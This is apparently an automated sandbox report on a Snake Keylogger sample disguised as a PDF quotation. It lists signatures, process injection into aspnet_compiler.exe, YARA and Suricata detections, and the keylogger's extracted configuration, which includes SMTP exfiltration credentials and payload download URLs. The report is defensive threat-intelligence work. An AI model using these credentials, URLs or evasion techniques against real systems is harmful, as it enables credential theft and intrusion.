Edit tour

Windows Analysis Report
QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Overview

General Information

Sample name:	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe renamed because original name is a hash value
Original sample name:	QUOTATION_SEPQTRA071244PDF.scr.exe
Analysis ID:	1519261
MD5:	631691dca7abc573a0cc911b2ddca40e
SHA1:	0ddc497bb233cda946e320378cde5e5cc507eb72
SHA256:	922ff7b2589cfa1d6a8dcd706bc294be4d4cb4d9baf02df5717d121097ab1859
Tags:	exescruser-abuse_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Creates a thread in another existing process (thread injection)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION_SEPQTRA071244#U00faPDF.scr.exe (PID: 6044 cmdline: "C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe" MD5: 631691DCA7ABC573A0CC911B2DDCA40E)

aspnet_compiler.exe (PID: 5792 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)

conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "rep3send@aoqiinflatables.com", "Password": "Zg^!Zy[?IKrs99@soltan", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2646867703.0000028ACEA50000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1cb0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x51e6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14522:$a1: get_encryptedPassword 0x1480e:$a2: get_encryptedUsername 0x1432e:$a3: get_timePasswordChanged 0x14429:$a4: get_passwordField 0x14538:$a5: set_encryptedPassword 0x15b1c:$a7: get_logins 0x15a7f:$a10: KeyLoggerEventArgs 0x15718:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be25:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b057:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b48a:$a4: \Orbitum\User Data\Default\Login Data 0x1c4c9:$a5: \Kometa\User Data\Default\Login Data
00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x150bd:$s1: UnHook 0x150c4:$s2: SetHook 0x150cc:$s3: CallNextHook 0x150d9:$s4: _hook
00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17dd4:$x1: $%SMTPDV$ 0x17e3a:$x2: $#TheHashHere%& 0x1943f:$x3: %FTPDV$ 0x19529:$x4: $%TelegramDv$ 0x15718:$x5: KeyLoggerEventArgs 0x15a7f:$x5: KeyLoggerEventArgs 0x19463:$m2: Clipboard Logs ID 0x19679:$m2: Screenshot Logs ID 0x19789:$m2: keystroke Logs ID 0x19a63:$m3: SnakePW 0x19651:$m4: \SnakeKeylogger\
00000005.00000002.3402009366.0000022935F56000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b60a:$a1: get_encryptedPassword 0x1b8f6:$a2: get_encryptedUsername 0x1b416:$a3: get_timePasswordChanged 0x1b511:$a4: get_passwordField 0x1b620:$a5: set_encryptedPassword 0x1cc04:$a7: get_logins 0x1cb67:$a10: KeyLoggerEventArgs 0x1c800:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1eebc:$x1: $%SMTPDV$ 0x1ef22:$x2: $#TheHashHere%& 0x20527:$x3: %FTPDV$ 0x20611:$x4: $%TelegramDv$ 0x1c800:$x5: KeyLoggerEventArgs 0x1cb67:$x5: KeyLoggerEventArgs 0x2054b:$m2: Clipboard Logs ID 0x20761:$m2: Screenshot Logs ID 0x20871:$m2: keystroke Logs ID 0x20b4b:$m3: SnakePW 0x20739:$m4: \SnakeKeylogger\
00000000.00000002.2665435188.0000028AE6E50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.3400141664.0000022934010000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21908:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x24e3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2653955478.0000028ADE5A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x47ba0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4b0d6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2646867703.0000028ACE51D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe PID: 6044	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 5792	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 5792	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 5792	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x166fe:$a1: get_encryptedPassword 0x2fc64:$a1: get_encryptedPassword 0x169e0:$a2: get_encryptedUsername 0x2ff46:$a2: get_encryptedUsername 0x16514:$a3: get_timePasswordChanged 0x2fa7a:$a3: get_timePasswordChanged 0x1660f:$a4: get_passwordField 0x2fb75:$a4: get_passwordField 0x16714:$a5: set_encryptedPassword 0x2fc7a:$a5: set_encryptedPassword 0x18c2f:$a7: get_logins 0x32195:$a7: get_logins 0x18b92:$a10: KeyLoggerEventArgs 0x320f8:$a10: KeyLoggerEventArgs 0x1882b:$a11: KeyLoggerEventArgsEventHandler 0x31d91:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aspnet_compiler.exe PID: 5792	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1882b:$x5: KeyLoggerEventArgs 0x18b92:$x5: KeyLoggerEventArgs 0x191d2:$x5: KeyLoggerEventArgs 0x19506:$x5: KeyLoggerEventArgs 0x31d91:$x5: KeyLoggerEventArgs 0x320f8:$x5: KeyLoggerEventArgs 0x32738:$x5: KeyLoggerEventArgs 0x32a6c:$x5: KeyLoggerEventArgs 0x1ad6b:$m2: Clipboard Logs ID 0x1ae5d:$m2: Screenshot Logs ID 0x1aeb3:$m2: keystroke Logs ID 0x342d1:$m2: Clipboard Logs ID 0x343c3:$m2: Screenshot Logs ID 0x34419:$m2: keystroke Logs ID 0x1afe8:$m3: SnakePW 0x3454e:$m3: SnakePW 0x1ae49:$m4: \SnakeKeylogger\ 0x343af:$m4: \SnakeKeylogger\
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6e50000.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.aspnet_compiler.exe.22934340000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.22934340000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.22934340000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12722:$a1: get_encryptedPassword 0x12a0e:$a2: get_encryptedUsername 0x1252e:$a3: get_timePasswordChanged 0x12629:$a4: get_passwordField 0x12738:$a5: set_encryptedPassword 0x13d1c:$a7: get_logins 0x13c7f:$a10: KeyLoggerEventArgs 0x13918:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.22934340000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a025:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19257:$a3: \Google\Chrome\User Data\Default\Login Data 0x1968a:$a4: \Orbitum\User Data\Default\Login Data 0x1a6c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.22934340000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x132bd:$s1: UnHook 0x132c4:$s2: SetHook 0x132cc:$s3: CallNextHook 0x132d9:$s4: _hook
5.2.aspnet_compiler.exe.22934340000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15fd4:$x1: $%SMTPDV$ 0x1603a:$x2: $#TheHashHere%& 0x1763f:$x3: %FTPDV$ 0x17729:$x4: $%TelegramDv$ 0x13918:$x5: KeyLoggerEventArgs 0x13c7f:$x5: KeyLoggerEventArgs 0x17663:$m2: Clipboard Logs ID 0x17879:$m2: Screenshot Logs ID 0x17989:$m2: keystroke Logs ID 0x17c63:$m3: SnakePW 0x17851:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14522:$a1: get_encryptedPassword 0x1480e:$a2: get_encryptedUsername 0x1432e:$a3: get_timePasswordChanged 0x14429:$a4: get_passwordField 0x14538:$a5: set_encryptedPassword 0x15b1c:$a7: get_logins 0x15a7f:$a10: KeyLoggerEventArgs 0x15718:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be25:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b057:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b48a:$a4: \Orbitum\User Data\Default\Login Data 0x1c4c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x150bd:$s1: UnHook 0x150c4:$s2: SetHook 0x150cc:$s3: CallNextHook 0x150d9:$s4: _hook
5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17dd4:$x1: $%SMTPDV$ 0x17e3a:$x2: $#TheHashHere%& 0x1943f:$x3: %FTPDV$ 0x19529:$x4: $%TelegramDv$ 0x15718:$x5: KeyLoggerEventArgs 0x15a7f:$x5: KeyLoggerEventArgs 0x19463:$m2: Clipboard Logs ID 0x19679:$m2: Screenshot Logs ID 0x19789:$m2: keystroke Logs ID 0x19a63:$m3: SnakePW 0x19651:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.22934340000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.22934340000.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.22934340000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14522:$a1: get_encryptedPassword 0x1480e:$a2: get_encryptedUsername 0x1432e:$a3: get_timePasswordChanged 0x14429:$a4: get_passwordField 0x14538:$a5: set_encryptedPassword 0x15b1c:$a7: get_logins 0x15a7f:$a10: KeyLoggerEventArgs 0x15718:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.22945d200e8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.22934340000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be25:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b057:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b48a:$a4: \Orbitum\User Data\Default\Login Data 0x1c4c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.22945d200e8.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.aspnet_compiler.exe.22934340000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x150bd:$s1: UnHook 0x150c4:$s2: SetHook 0x150cc:$s3: CallNextHook 0x150d9:$s4: _hook
5.2.aspnet_compiler.exe.22934340000.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17dd4:$x1: $%SMTPDV$ 0x17e3a:$x2: $#TheHashHere%& 0x1943f:$x3: %FTPDV$ 0x19529:$x4: $%TelegramDv$ 0x15718:$x5: KeyLoggerEventArgs 0x15a7f:$x5: KeyLoggerEventArgs 0x19463:$m2: Clipboard Logs ID 0x19679:$m2: Screenshot Logs ID 0x19789:$m2: keystroke Logs ID 0x19a63:$m3: SnakePW 0x19651:$m4: \SnakeKeylogger\
5.2.aspnet_compiler.exe.22945d200e8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12722:$a1: get_encryptedPassword 0x12a0e:$a2: get_encryptedUsername 0x1252e:$a3: get_timePasswordChanged 0x12629:$a4: get_passwordField 0x12738:$a5: set_encryptedPassword 0x13d1c:$a7: get_logins 0x13c7f:$a10: KeyLoggerEventArgs 0x13918:$a11: KeyLoggerEventArgsEventHandler
5.2.aspnet_compiler.exe.22945d200e8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a025:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19257:$a3: \Google\Chrome\User Data\Default\Login Data 0x1968a:$a4: \Orbitum\User Data\Default\Login Data 0x1a6c9:$a5: \Kometa\User Data\Default\Login Data
5.2.aspnet_compiler.exe.22945d200e8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x132bd:$s1: UnHook 0x132c4:$s2: SetHook 0x132cc:$s3: CallNextHook 0x132d9:$s4: _hook
5.2.aspnet_compiler.exe.22945d200e8.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15fd4:$x1: $%SMTPDV$ 0x1603a:$x2: $#TheHashHere%& 0x1763f:$x3: %FTPDV$ 0x17729:$x4: $%TelegramDv$ 0x13918:$x5: KeyLoggerEventArgs 0x13c7f:$x5: KeyLoggerEventArgs 0x17663:$m2: Clipboard Logs ID 0x17879:$m2: Screenshot Logs ID 0x17989:$m2: keystroke Logs ID 0x17c63:$m3: SnakePW 0x17851:$m4: \SnakeKeylogger\
0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf1f39b8.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 22 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, ParentProcessId: 6044, ParentProcessName: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 5792, ProcessName: aspnet_compiler.exe

Suricata Signatures

ET MALWARE PE EXE or DLL Windows file download Text M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:23:21.173991+0200	2022640	1	A Network Trojan was detected	188.114.97.3	443	192.168.2.6	49713	TCP

ET MALWARE PE EXE or DLL Windows file download disguised as ASCII

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:23:21.173991+0200	2017962	1	A Network Trojan was detected	188.114.97.3	443	192.168.2.6	49713	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:24:09.511667+0200	2803305	3	Unknown Traffic	192.168.2.6	49723	188.114.96.3	443	TCP
2024-09-26T09:24:12.846196+0200	2803305	3	Unknown Traffic	192.168.2.6	49730	188.114.96.3	443	TCP
2024-09-26T09:24:14.010726+0200	2803305	3	Unknown Traffic	192.168.2.6	49732	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:24:08.120101+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49721	193.122.130.0	80	TCP
2024-09-26T09:24:08.916988+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49721	193.122.130.0	80	TCP
2024-09-26T09:24:10.088998+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49724	193.122.130.0	80	TCP
2024-09-26T09:24:11.182593+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49727	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "rep3send@aoqiinflatables.com", "Password": "Zg^!Zy[?IKrs99@soltan", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE985000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE4A2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2666267100.0000028AE7130000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE51A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE985000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE4A2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2666267100.0000028AE7130000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE51A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD34859C0Bh	5_2_00007FFD348599AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD3485874Bh	5_2_00007FFD348584EC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD3485A225h	5_2_00007FFD3485A141
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD34858C7Bh	5_2_00007FFD34858A1C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD34857060h	5_2_00007FFD34856E1F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD348596DBh	5_2_00007FFD34858946
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD3485A225h	5_2_00007FFD34858946
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD3485742Dh	5_2_00007FFD3485720A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD34857EEBh	5_2_00007FFD3485720A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 188.114.97.3:443 -> 192.168.2.6:49713
Source: Network traffic	Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 188.114.97.3:443 -> 192.168.2.6:49713

Source: global traffic	HTTP traffic detected: GET /data-package/Ky4pZ0WB/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/klH4VFXHnzlT HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/Ky4pZ0WB/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
